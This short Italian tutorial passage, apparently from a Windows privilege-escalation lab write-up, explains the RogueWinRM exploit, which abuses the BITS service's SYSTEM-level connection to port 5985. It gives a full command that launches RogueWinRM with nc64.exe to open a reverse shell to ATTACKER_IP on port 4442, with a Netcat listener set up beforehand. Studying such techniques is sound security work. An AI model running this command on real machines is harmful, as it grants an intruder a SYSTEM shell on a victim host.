L’exploit RogueWinRM è possibile perché ogni volta che un utente (inclusi gli utenti senza privilegi) avvia il servizio BITS in Windows, crea automaticamente una connessione alla porta 5985 utilizzando i privilegi di SISTEMA. La porta 5985 viene in genere utilizzata per il servizio WinRM, che è semplicemente una porta che espone una console Powershell da utilizzare in remoto tramite la rete. Immaginatelo come SSH, ma con Powershell.
Una volta scaricato e trasferito l’exploit sulla macchina vittima lo possiamo attivare con il seguente comando dopo esserci già messi in ascolto con Netcat:
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"Dove:
-
Il parametro -p specifica l’eseguibile che l’exploit deve eseguire, in questo caso nc64.exe.
-
Il parametro -a viene utilizzato per passare argomenti all’eseguibile. Poiché vogliamo che nc64 stabilisca una reverse shell contro la macchina dell’attaccante, gli argomenti da passare a netcat saranno -e cmd.exe ATTACKER_IP 4442